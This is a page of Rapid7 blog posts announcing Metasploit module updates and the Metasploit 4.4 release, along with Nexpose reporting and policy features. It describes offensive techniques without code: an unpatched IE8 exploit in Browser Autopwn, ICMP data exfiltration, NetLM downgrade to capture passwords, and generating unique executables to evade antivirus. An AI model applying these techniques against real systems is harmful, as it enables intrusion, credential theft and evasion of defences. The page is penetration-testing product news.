Today marks the first Metasploit update of the new year, and it's been a little while since the last, so there's a bumper crop of new modules; eighteen to be precise.Internet Explorer 0-day and Browser AutopwnWhile we didn't ship an update over the holidays,…

Today marks the first Metasploit update of the new year, and it's been a little while since the last, so there's a bumper crop of new modules; eighteen to be precise.Internet Explorer 0-day and Browser AutopwnWhile we didn't ship an update over the holidays, that didn't stop @_sinn3r, @_juan_vazquez_, @eromang, @yomuds, and @binjo from tearing into the latest public 0-day for Microsoft Internet Explorer 8. For the details on exploit development, take a look at sinn3r's fantastico write up. As with all complex and interesting exploits, there's always some touch up after the initial release, and ie_cbutton_uaf is no exception. It's now a component of Metasploit's Browser Autopwn meta-module.If you aren't familiar, Browser Autopwn is a throw-everything-at-it approach to client exploitation, and it's been a part of Metasploit for several years now. Here's a video of one of the earlier incarnations by the guys over at pauldotcom, and the usual use hasn't changed a whole lot since then (however, many more exploits are now included). As you can see, all you need to do is fire it up, let all the exploits set themselves up, then await your target. If he's running IE8, you can be sure that ie_cbutton_uaf will pop a shell for you, since as of this writing, there's still no hotfix available.ICMP ExfiltrationEvery once in a while, you might find your self in an argument with a network engineer about the security implications of ping. Yes, good old, reliable, required by RFC792 ICMP Type 8 ping. What harm could there be in allowing computers to ping arbitrary hosts on the Internet?Well, this update includes community contributor @ChrisJohnRiley's delightful ICMP Exfiltration Service module. What this does is set up a listener to catch data tunneled out of a target site over good old, reliable, required by RFC792 ICMP Type 8 ping. The data being exfiltrated out is then saved off as loot, for use in your report demonstrating the security implications of allowing ping from the desktop.If you're dealing with a client that doesn't care about exfiltration, then first, you should get them to read Iftach Ian Amit's paper from January of 2012, and then remind them that if they spent any time at all on splitting their DNS infrastructure, implementing egress firewall rules, or implementing a BYOD policy, then they are implicitly buying into to exfiltration awareness anyway.Windows Post ModulesAlso this week, we see three new post modules from community contributor @zeknox. I'm a fan of post modules; they're usually pretty easy to write and test, and often end up automating off an otherwise troublesome pen-testing chore. Of the bunch, my favorite is the Windows NetLM Downgrade Attack; this is a sneaky way to snag cleartext passwords from a user by forcing a machine to use the weak LM hashing algorithm when authenticating to SMB servers. This comes in handy, of course, when you control the SMB server in question. For more on this technique, see Brandon's write-up over on Pentestgeek.com, or the original scenario described by Dave Howard.Report SpeedupsFor those of you on Metasploit Pro and Express, you should also see significant improvements in your report generation. All Standard Reports there have been updated to use disk virtualization. Instead of holding the report generation objects in memory, they are now written to disk as needed. The main goal of this change was to allow the generation of reports against datasets of any arbitrary size. Very large numbers of hosts or other objects that previously caused report generation to crash are now handled with the greatest of ease. Additional gravy: report generation now uses about 25% less memory and takes 13% less time on average!New ModulesLast update had just the one new module. We make up for that this week, with eighteen. Here they are. Exploit modules Netwin SurgeFTP Remote Command Execution by sinn3r and Spencer McIntyreFoswiki MAKETEXT Remote Command Execution by juan vazquez and Brian Carlson exploits CVE-2012-6329TWiki MAKETEXT Remote Command Execution by juan vazquez and George Clark exploits CVE-2012-6329WordPress Asset-Manager PHP File Upload Vulnerability by James Fitts and Sammy FORGIT exploits OSVDB-82653WordPress WP-Property PHP File Upload Vulnerability by James Fitts and Sammy FORGIT exploits OSVDB-82656Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability by sinn3r, juan vazquez, eromang, and mahmud ab rahman exploits CVE-2012-4792InduSoft Web Studio ISSymbol.ocx InternationalSeparator() Heap Overflow by juan vazquez, Alexander Gavrun, Dmitriy Pletnev, and James Fitts exploits ZDI-12-168IBM Lotus iNotes dwa85W ActiveX Buffer Overflow by juan vazquez and Gaurav Baruah exploits ZDI-12-132IBM Lotus Notes Client URL Handler Command Injection by juan vazquez, Moritz Jodeit, and Sean de Regge exploits ZDI-12-154IBM Lotus QuickR qp2 ActiveX Buffer Overflow by juan vazquez and Gaurav Baruah exploits ZDI-12-134RealPlayer RealMedia File Handling Buffer Overflow by suto exploits CVE-2012-5691Microsoft SQL Server Database Link Crawling Command Execution by Antti Rantasaari and Scott Sutherland "nullbind" Auxiliary and Post modules SVN wc.db Scanner by Stephen HaywoodSAPRouter Admin Request by Chris John Riley, Ian de Villiers, Joris van de Vis, Mariano Nunez, and nomnkeeICMP Exfiltration Service by Chris John RileyWindows Gather Spark IM Password Extraction by Brandon McCann "zeknox" and Thomas McCarthy "smilingraccoon"Windows Gather Local Admin Search by Brandon McCann "zeknox", Royce Davis "r3dy", and Thomas McCarthy "smilingraccoon"Windows NetLM Downgrade Attack by Brandon McCann "zeknox" and Thomas McCarthy "smilingraccoon"AvailabilityIf you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.For additional details on what's changed and what's current, please see Brandon Turner's most excellent release notes.

Significantly Enhanced, yet Simplified Reporting

The new year is just around the corner and the Internet has been available to users for almost two decades now. We have had user experiences that have pushed the boundaries with software, touchscreen devices and mobile applications. We are now witnessing radical changes in…

The new year is just around the corner and the Internet has been available to users for almost two decades now. We have had user experiences that have pushed the boundaries with software, touchscreen devices and mobile applications. We are now witnessing radical changes in user expectations. We at Rapid7 are constantly striving to understand these expectations and live up to them.At Rapid7, our mission is to solve complex security challenges with simple, innovative solutions that offer speed with control. It goes without saying that we focus on a better user experience for our products, time and again, with every new release. The four vital elements of user experience are Value, Usability, Adoptability and Desirability.Based on: www.uxmatters.comFor our enterprise products like Nexpose and Metasploit, I see Value, Usability and Adoptability roll up into one element and that is efficiency - How efficiently can a user get the job done?  We started out with prioritizing the features and since reporting is one of the most used features of Nexpose, we decided to start with improving the reporting experience for Nexpose 5.5 release.One place for all reporting needsAll reporting needs are rolled up into 3 user goals: Create report, View report and manage report templates. With a streamlined interface, you can build and run reports, and create report templates faster than ever before. The Reports configuration panel now features a clean layout and a three-tab navigation that simplifies all report-related tasks. The 3 tabs representing these 3 goals are designed to follow the concept of “Don't make me think”. Based on the users' goals, they can select the specific tab to directly access the desired tasks.Simplified report creation workflowThe “Create New Report” UI is far more intuitive and efficient than before.Flexibility and efficiency of useOur research showed that most of our users use only some primary report creation settings. Only a few users occasionally need flexibility to configure advanced settings. Based on that, we have hidden the advanced settings making the UI simple and clutter-free. The system can now cater to both inexperienced and experienced users.Recognition rather than recallAll canned report templates now come with a preview image that minimizes the user's memory load by making options visible. You no longer have to remember report names. Using the new carousel feature, you can scroll through template previews and enlarge views to see them in better detail.Easy recovery from errorsWe understand “To err is human”. Inline error messages will help you quickly recognize and recover from any errors.Cleaner, minimalist interfaceThe new minimalist table UI reduces clutter, and is designed for visual relief, without having to sacrifice any of the existing functionality. In new design we have also ensured that the system status is visible and obvious. Easy to use powerful Report template configuration featuresIt was never this easy to create and customize report templates.  You can now choose from 3 different ways to create report templates:Report template type 1-Document (PDF, HTML, RTF formats) Simply drag and drop available report sections to create a customized report template.Report template type 2-Export (CSV format)Use this type when you would like to export specific data fields.Report template type 3- Upload a template file (New)This is one of the most exciting and powerful features introduced in Nexpose. The new reporting engine allows you to upload additional report templates which can be downloaded from Rapid7 Community.New Report Templates Two new report templates isolate the assets that have a high number of threats, so that you can prioritize remediation tasks accordingly:• Top 10 Assets by Vulnerabilities lists 10 assets with the most vulnerabilities. It displays total vulnerabilities, malware and exploit exposures for those vulnerabilities.• Top 10 Assets by Vulnerability Risk lists 10 assets with the highest risk scores. It displays risk scores, total vulnerabilities, and malware and exploit exposures for those assets.At Rapid7 we are committed to improving the user experience for our customers.  Feel free to leave me a message here or you can directly contact me at saurabh_dutta@rapid7.com

Security Configuration assessment capabilities that meet your needs with Nexpose 5.4

A new great looking feature in our configuration assessment component has been added in Nexpose 5.4: the ability to customize policies to meet your unique contextual needs, i.e. are specific to your environment. You are now going to be able to copy a…

A new great looking feature in our configuration assessment component has been added in Nexpose 5.4: the ability to customize policies to meet your unique contextual needs, i.e. are specific to your environment. You are now going to be able to copy a built-in policy, edit its configuration including the policy checks values to test your assets for compliance. This flexibility allows for custom, accurate and relevant configuration assessment.Configuration assessment is important to assess the risk in deployments where heterogeneous configurations are present. It allows identifying the assets that are presenting a risk to a network by being misconfigured. Another advantage on configuration assessment is that it allows identifying the most and least compliant rules for each policy. This means that you will be able to identify not only areas where you are doing good, but also potential areas where your policies may not make sense.The goal is then to assess configuration compliance for policies that make sense to your particular needs. One good example when this can become handy: Let's say your company policy for account lockout threshold is more restrictive than the FDCC Windows policy one(less than or equal to five). Your company has decided that three failed attempts can occur before an account is locked out.  You can now easily copy the FDCC policy, Find the Account Lockout Threshold rule, and tweak it to check for three instead of five.This is where the policy editor and the new features shipped with Nexpose 5.4 come into play. There are several operations that were enabled on built-in policies, and some other that can be done against copies of the built-in policies.Operations on built-in policies include:Viewing the policy structure and check values with the policy viewerCopying the policyOperations on copies (custom) policies include:Viewing the policy structure and check values with the policy viewerCopying the policyEditing the policyDeleting the policyAll these options are available on the policies tab:When you are on the policy viewer you can browse through the policy structure to find the groupings and rules that you are interested in, as well as using the "Find" mechanism to get to it. On viewer mode, you will only be able to see how a policy is configured.On the left hand side you will see the policy structure in a tree format. On the right hand side you will see the details for the node selected on the left hand side.When you are on the policy editor, you can not only browse through the policy structure, you can also modify the summary details for the policy (like its name and description), groups, rules and check values. Notice the "Save" and "Cancel" buttons available to save or cancel your modifications to the policy.Once you have configured your policy to address your particular needs, you are ready to start checking for compliance on policies that you care about.Stay tuned, there's more coming.

New Metasploit 4.4: Risk Validation for Vulnerability Management with Nexpose, Improved AV Evasion, and Faster UI

Fresh out of the oven and in time for Black Hat Las Vegas, we present to you the new Metasploit 4.4 with these great new features:Focus Your Remediation Efforts: Metasploit Risk Validation for Nexpose Vulnerability ManagementYou may have been in this situation: your…

Fresh out of the oven and in time for Black Hat Las Vegas, we present to you the new Metasploit 4.4 with these great new features:Focus Your Remediation Efforts: Metasploit Risk Validation for Nexpose Vulnerability ManagementYou may have been in this situation: your vulnerability scanning report is so long you don't know where to start. You don't have time to address all vulnerabilities, and you don't know which ones are important. If this sounds familiar, you may get very excited about Metasploit Pro's new and improved integration with Rapid7 Nexpose, which makes your problem go away.Why does this challenge exist in the first place? Vulnerability scanners can identify what software versions are installed and knows which software versions have potential vulnerabilities, but they can't detect whether a firewall, IDS, or other compensating controls affect the exploitability. Without being able to validate the risks, IT teams may be focusing on lower priority risks, rather than prioritizing vulnerabilities with known exploits and no compensating controls associated, which represent a very real threat to the organization.By integrating Metasploit Pro with Nexpose for risk validation, you can now prioritize the critical vulnerabilities that pose a real risk, fixing them before it's too late. Now you can focus your efforts on what matters.Specifically, Metasploit now tightly integrates with Nexpose by:Importing rich vulnerability data from Nexpose scans, sites, and XMLAutomatically validating the exploitability of many high-risk vulnerabilitiesProviding a simplified process to spot-check individual vulnerabilitiesPushing granular exploit results back to Nexpose via Vulnerability ExceptionsPushing device classifications back to Nexpose Asset Groups via Metasploit TagsEnhancing Metasploit reports with detailed Nexpose scan dataSecurity professionals benefit from the integration in the following ways:Quickly identify high-risk vulnerabilities not protected by compensating controlsMeasure the effectiveness of defensive solutions designed  to mitigate vulnerabilitiesIncrease credibility and reduce friction between IT operations and security teamsOn July 18 at 2pm EST, HD Moore will demonstrate the new functionality in the free webcast “Validate Risks in Your Security Assessment Program”. Register now - limited seats!Improved AV Evasion: "Now they will tremble again, at the sound of our silence" - The Hunt for Red OctoberSecurity is often an adversarial process. Metasploit is a part of the offensive side of that equation, constantly pushing the defenders to adjust and innovate. This involves a certain ammount of good-natured give-and-take between us here at Metasploit and the vendors who make defensive products like anti-virus solutions. The response to Metasploit from the AV world has been a mixed bag. Over the years our payloads have gotten higher and higher detection rates. This is especially true when an actual executable binary has to land on the target system, such as in the case of the psexec module. We have recently set out to respond back to the AV vendors to once again challenge them to step up their game while we enable our team to slip past their defenses yet again.The problem is essentially two-fold, as it always is with AV. There are the signature detections. These, by and large, appear to be cases where the AV vendors literally copied our template files that the payloads get inserted into, and wrote signatures for them. That way they would pick us up no matter what payload was used, because the template itself would be flagged. This is an extremely lazy approach but has the virtue of being effective if we don't do anything about it. So the first step was to address the issue of these templates. We could generate new templates for our Metasploit Pro users, but we had done that once before and it only bought us a temporary reprieve. To create a more long-term solution we developed a method that generates a totally unique executable every time it's run, making it much more difficult for AV vendors to simply grab the template and write a signature.The second problem is heuristics. This is where the AV vendor actually watches the behavior of the code and tries to analyze it appropriately. This is a far more effective but much more tricky and complicated way of detecting malicious code. Some of the key factors for avoiding this involve hiding obviously suspicious behavior and making it look as normal and innocent as possible. So as we generate our executables each time we pay special care to avoid any obviously malicious activity, and look like a normal legitimate program.The current iteration of this technique is now available for users of the Metasploit Pro product when using the psexec exploit. When selecting the psexec module from the module runner, they can select the DynamicExe option from under Advanced Options. Also, when running a Metasploit Pro Bruteforce they can select 'Dynamically generate payload EXE for SMB' under the payload settings. These generated payloads will in many cases do a better job at evading anti-virus solutions than our old templates. However, they do not have the virtue of being signed. We will continue to improve this feature over the coming weeks, and hopefully continue to improve our ability to evade detection.Speedy UI, Even Under Heavy LoadWe've taken Metasploit into the wind tunnel and made it a lot more aerodynamic for users who are handling tens of thousands of hosts. The user interface now responds much faster, so you'll have to find a better excuse for your coffee break.Shiny New Auxiliary and Exploit ModulesAs usual, the big point releases cater more to the commercial Metasploit users while our regular weekly updates provide value to our open source community. Since we released Metasploit 4.3 on April 24, we added 101 new modules to Metasploit: 68 exploits, 22 auxiliary modules, 9 post modules, 1 payload, and 1 encoder. All of these are also available in the free Metasploit Community Edition and in the open source Metasploit Framework, which were both updated with this release.Since our last weekly update, we've added a these new modules to our exploit database:Sielco Sistemi Winlog Remote File Access by Luigi Auriemma and juan exploits BID-54212Authentication Capture: DRDA (DB2, Informix, Derby) by Patrik KarlssonAuthentication Capture: MSSQL by Patrik KarlssonAuthentication Capture: VNC by Patrik KarlssonALLMediaServer 0.8 Buffer Overflow by juan vazquez, modpr0be and motaz reda exploits EDB-19625Please refer to the release notes for a full list of all new modules since version 4.3.Metasploit 4.4 is Waiting For YouIf you'd like to see more details on what's in the new release, please read Tod Beardsley's most excellent release notes. If you're already drooling to get the new release, you can download Metasploit now.

Featured Research

National Exposure Index 2017

The National Exposure Index is an exploration of data derived from Project Sonar, Rapid7's security research project that gains insights into global exposure to common vulnerabilities through internet-wide surveys.

Learn More

Toolkit

Make Your SIEM Project a Success with Rapid7

In this toolkit, get access to Gartner's report “Overcoming Common Causes for SIEM Solution Deployment Failures,” which details why organizations are struggling to unify their data and find answers from it. Also get the Rapid7 companion guide with helpful recommendations on approaching your SIEM needs.

Download Now

Podcast

Security Nation

Security Nation is a podcast dedicated to covering all things infosec – from what's making headlines to practical tips for organizations looking to improve their own security programs. Host Kyle Flaherty has been knee–deep in the security sector for nearly two decades. At Rapid7 he leads a solutions-focused team with the mission of helping security professionals do their jobs.

Listen Now